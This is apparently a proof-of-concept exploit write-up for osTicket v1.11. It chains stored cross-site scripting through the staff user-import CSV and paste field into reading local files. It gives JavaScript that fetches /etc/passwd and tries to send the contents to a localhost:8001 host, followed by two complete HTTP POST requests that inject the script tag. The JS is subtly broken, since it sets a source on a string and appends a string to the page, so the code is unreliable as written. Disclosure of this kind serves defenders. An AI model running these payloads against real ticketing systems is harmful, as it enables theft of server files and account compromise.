function readTextFile(file)
{
    var rawFile = new XMLHttpRequest();
    rawFile.open("GET", file, false);
    rawFile.onreadystatechange = function ()
    {
        if(rawFile.readyState === 4)
        {
            if(rawFile.status === 200 || rawFile.status == 0)
            {
                var allText = rawFile.responseText;
                allText.src = 'http://localhost:8001' + rawFile.responseText;
                document.body.appendChild(allText);
            }
        }
    }
    rawFile.send(null);
}

readTextFile("/etc/passwd");

Smilar JS File Link;

osTicket-v1.11/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36

After this process, we can run the JS file in XSS vulnerability.

Our First Request for XSS to LFI;


POST /4/osTicket-v1.11/upload/scp/users.php?do=import-users HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/4/osTicket-v1.11/upload/scp/users.php
Content-Type: multipart/form-data; boundary=---------------------------7588249895303196131592908750
Content-Length: 681
Cookie: OSTSESSID=d9e1bc19e9d8a6bcdcfd787d89b90877
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------7588249895303196131592908750
Content-Disposition: form-data; name="__CSRFToken__"

8f6f85b8d76218112a53f909692f3c4ae7768b39
-----------------------------7588249895303196131592908750
Content-Disposition: form-data; name="pasted"


-----------------------------7588249895303196131592908750
Content-Disposition: form-data; name="import"; filename="users-20190408.csv"
Content-Type: text/csv

script src="http://localhost/4/osTicket-v1.11/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36">/script>

Note: I removed the "<" signs. Don't forget to add it when you experiment.

-----------------------------7588249895303196131592908750--



------------------------------------------------

Our Second Request for XSS to LFI;


POST /4/osTicket-v1.11/upload/scp/ajax.php/users/import HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/4/osTicket-v1.11/upload/scp/users.php?do=import-users
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFToken: 8f6f85b8d76218112a53f909692f3c4ae7768b39
X-Requested-With: XMLHttpRequest
Content-Length: 317
Cookie: OSTSESSID=d9e1bc19e9d8a6bcdcfd787d89b90877
Connection: close

__CSRFToken__=8f6f85b8d76218112a53f909692f3c4ae7768b39&pasted=%3Cscript+src%3D%22http%3A%2F%2Flocalhost%2F4%2FosTicket-v1.11%2Fupload%2Ffile.php%3Fkey%3Dy3cxcoxqv8r3miqczzj5ar8rhm1bhcbm%26expires%3D1554854400%26signature%3Dbe5cea87c37d7971e0c54164090a391066ecbaca%26id%3D36%22%3E%3C%2Fscript%3E&undefined=Import+Users

By carrying out a similar attack. The XSS vulnerability constitutes the LFI vulnerability. In order for the attack to take place, the agent manager user must upload the sent ".csv" file.